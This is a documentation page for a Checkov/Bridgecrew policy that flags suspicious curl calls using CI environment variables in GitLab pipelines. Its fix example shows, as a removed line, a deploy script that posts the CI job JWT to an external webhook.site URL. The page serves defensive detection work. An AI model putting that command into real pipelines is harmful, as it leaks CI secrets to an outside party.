PlatformResourcesSign inSign Up

Suspicious use of curl with CI environment variables in script

Error: Suspicious use of curl in a GitLab CI environment
Bridgecrew Policy ID: BC_REPO_GITLAB_CI_1
Checkov Check ID: CKV_GITLABCI_1
Severity: LOW

Suggest Edits

Ensure that there are no suspicious uses of curl with CI environment variables in script

Description

Using curl with environment variables could be an attempt to exfiltrate secrets from a pipeline. Investigate if the use of curl is appropriate and secure.

Example Fix

Block code and remove code that attempts to exfiltrate secrets.

deploy:
-  script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826'

Updated 4 months ago